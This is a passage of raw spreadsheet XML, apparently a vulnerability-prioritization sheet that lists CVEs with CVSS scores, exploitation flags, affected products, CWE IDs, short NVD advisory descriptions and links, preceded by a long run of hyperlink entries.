    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5929" r:id="rId5928"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5930" r:id="rId5929"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5931" r:id="rId5930"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5932" r:id="rId5931"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5933" r:id="rId5932"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5934" r:id="rId5933"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5935" r:id="rId5934"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5936" r:id="rId5935"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5937" r:id="rId5936"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5938" r:id="rId5937"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5939" r:id="rId5938"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5940" r:id="rId5939"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5941" r:id="rId5940"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5942" r:id="rId5941"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5943" r:id="rId5942"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5944" r:id="rId5943"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5945" r:id="rId5944"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5946" r:id="rId5945"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5947" r:id="rId5946"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5948" r:id="rId5947"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5949" r:id="rId5948"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5950" r:id="rId5949"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5951" r:id="rId5950"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5952" r:id="rId5951"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5953" r:id="rId5952"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5954" r:id="rId5953"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5955" r:id="rId5954"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5956" r:id="rId5955"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5957" r:id="rId5956"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5958" r:id="rId5957"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5959" r:id="rId5958"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5960" r:id="rId5959"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5961" r:id="rId5960"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5962" r:id="rId5961"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5963" r:id="rId5962"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5964" r:id="rId5963"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5965" r:id="rId5964"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5966" r:id="rId5965"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5967" r:id="rId5966"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5968" r:id="rId5967"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5969" r:id="rId5968"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5970" r:id="rId5969"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5971" r:id="rId5970"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5972" r:id="rId5971"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5973" r:id="rId5972"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5974" r:id="rId5973"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5975" r:id="rId5974"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5976" r:id="rId5975"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5977" r:id="rId5976"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5978" r:id="rId5977"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5979" r:id="rId5978"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5980" r:id="rId5979"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5981" r:id="rId5980"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5982" r:id="rId5981"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5983" r:id="rId5982"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5984" r:id="rId5983"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5985" r:id="rId5984"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5986" r:id="rId5985"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5987" r:id="rId5986"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5988" r:id="rId5987"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5989" r:id="rId5988"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5990" r:id="rId5989"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5991" r:id="rId5990"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5992" r:id="rId5991"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5993" r:id="rId5992"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5994" r:id="rId5993"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5995" r:id="rId5994"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5996" r:id="rId5995"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5997" r:id="rId5996"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5998" r:id="rId5997"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M5999" r:id="rId5998"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6000" r:id="rId5999"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6001" r:id="rId6000"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6002" r:id="rId6001"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6003" r:id="rId6002"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6004" r:id="rId6003"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6005" r:id="rId6004"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6006" r:id="rId6005"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6007" r:id="rId6006"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6008" r:id="rId6007"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6009" r:id="rId6008"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6010" r:id="rId6009"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6011" r:id="rId6010"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6012" r:id="rId6011"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6013" r:id="rId6012"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6014" r:id="rId6013"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6015" r:id="rId6014"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6016" r:id="rId6015"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6017" r:id="rId6016"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6018" r:id="rId6017"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6019" r:id="rId6018"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6020" r:id="rId6019"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6021" r:id="rId6020"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6022" r:id="rId6021"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6023" r:id="rId6022"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6024" r:id="rId6023"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6025" r:id="rId6024"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6026" r:id="rId6025"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6027" r:id="rId6026"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6028" r:id="rId6027"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6029" r:id="rId6028"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6030" r:id="rId6029"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6031" r:id="rId6030"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6032" r:id="rId6031"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6033" r:id="rId6032"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6034" r:id="rId6033"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6035" r:id="rId6034"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6036" r:id="rId6035"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6037" r:id="rId6036"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6038" r:id="rId6037"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6039" r:id="rId6038"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6040" r:id="rId6039"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6041" r:id="rId6040"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6042" r:id="rId6041"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6043" r:id="rId6042"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6044" r:id="rId6043"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6045" r:id="rId6044"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6046" r:id="rId6045"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6047" r:id="rId6046"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6048" r:id="rId6047"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6049" r:id="rId6048"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6050" r:id="rId6049"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6051" r:id="rId6050"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6052" r:id="rId6051"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6053" r:id="rId6052"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6054" r:id="rId6053"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6055" r:id="rId6054"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6056" r:id="rId6055"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6057" r:id="rId6056"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6058" r:id="rId6057"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6059" r:id="rId6058"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6060" r:id="rId6059"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6061" r:id="rId6060"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6062" r:id="rId6061"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6063" r:id="rId6062"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6064" r:id="rId6063"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6065" r:id="rId6064"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6066" r:id="rId6065"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6067" r:id="rId6066"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6068" r:id="rId6067"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6069" r:id="rId6068"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6070" r:id="rId6069"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6071" r:id="rId6070"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6072" r:id="rId6071"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6073" r:id="rId6072"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6074" r:id="rId6073"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6075" r:id="rId6074"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6076" r:id="rId6075"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6077" r:id="rId6076"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6078" r:id="rId6077"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6079" r:id="rId6078"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6080" r:id="rId6079"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6081" r:id="rId6080"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6082" r:id="rId6081"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6083" r:id="rId6082"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6084" r:id="rId6083"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6085" r:id="rId6084"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6086" r:id="rId6085"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6087" r:id="rId6086"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6088" r:id="rId6087"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6089" r:id="rId6088"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6090" r:id="rId6089"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6091" r:id="rId6090"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6092" r:id="rId6091"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6093" r:id="rId6092"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6094" r:id="rId6093"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6095" r:id="rId6094"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6096" r:id="rId6095"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6097" r:id="rId6096"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6098" r:id="rId6097"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6099" r:id="rId6098"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6100" r:id="rId6099"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6101" r:id="rId6100"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6102" r:id="rId6101"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6103" r:id="rId6102"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6104" r:id="rId6103"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6105" r:id="rId6104"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6106" r:id="rId6105"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6107" r:id="rId6106"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6108" r:id="rId6107"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6109" r:id="rId6108"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6110" r:id="rId6109"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6111" r:id="rId6110"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6112" r:id="rId6111"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6113" r:id="rId6112"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6114" r:id="rId6113"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6115" r:id="rId6114"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6116" r:id="rId6115"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6117" r:id="rId6116"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6118" r:id="rId6117"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6119" r:id="rId6118"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6120" r:id="rId6119"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6121" r:id="rId6120"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6122" r:id="rId6121"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6123" r:id="rId6122"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6124" r:id="rId6123"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6125" r:id="rId6124"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M6126" r:id="rId612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CVE-2026-20079</t>
        </is>
      </c>
      <c r="C2" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F2" s="5" t="n">
        <v>0.747</v>
      </c>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="H2" s="5" t="inlineStr">
        <is>
          <t>cisco:secure_firewall_management_center</t>
        </is>
      </c>
      <c r="I2" s="5" t="inlineStr">
        <is>
          <t>2026-03-04</t>
        </is>
      </c>
      <c r="J2" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the web interface of Cisco Secure Firewall Management Center (FMC) Software could allow an unauthenticated, remote attacker to bypass authentication and execute script files on an affected device to obtain root access to the underlying operating system.&amp;nbsp;
This vulnerability is due to an improper system process that is created at boot time. An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute a variety of scripts and commands that allow&amp;nbsp;root access to the device.&amp;nbsp;</t>
        </is>
      </c>
      <c r="M2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20079</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75650</t>
        </is>
      </c>
      <c r="C3" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D3" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F3" s="5" t="n">
        <v>0.021</v>
      </c>
      <c r="G3" s="5" t="inlineStr"/>
      <c r="H3" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="I3" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="K3" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="L3"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M3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75650</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86218</t>
        </is>
      </c>
      <c r="C4" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D4" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F4" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="inlineStr">
        <is>
          <t>n-able:n-central</t>
        </is>
      </c>
      <c r="I4" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J4" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="K4" s="5" t="inlineStr">
        <is>
          <t>CWE-96</t>
        </is>
      </c>
      <c r="L4" s="5" t="inlineStr">
        <is>
          <t>N-central is vulnerable to a pre-auth remote code execution This issue affects N-central: before 2026.3.1.14.</t>
        </is>
      </c>
      <c r="M4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86218</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>CVE-2016-4117</t>
        </is>
      </c>
      <c r="C5" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D5" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F5" s="5" t="n">
        <v>0.944</v>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="inlineStr">
        <is>
          <t>adobe:flash_player, opensuse:evergreen, opensuse:opensuse, redhat:enterprise_linux_desktop, redhat:enterprise_linux_server, redhat:enterprise_linux_server_from_rhui, redhat:enterprise_linux_workstation, suse:linux_enterprise_desktop, suse:linux_enterprise_workstation_extension</t>
        </is>
      </c>
      <c r="I5" s="5" t="inlineStr">
        <is>
          <t>2016-05-11</t>
        </is>
      </c>
      <c r="J5" s="5" t="inlineStr">
        <is>
          <t>2022-03-24</t>
        </is>
      </c>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr">
        <is>
          <t>Adobe Flash Player 21.0.0.226 and earlier allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in May 2016.</t>
        </is>
      </c>
      <c r="M5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2016-4117</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-41352</t>
        </is>
      </c>
      <c r="C6" s="5" t="n">
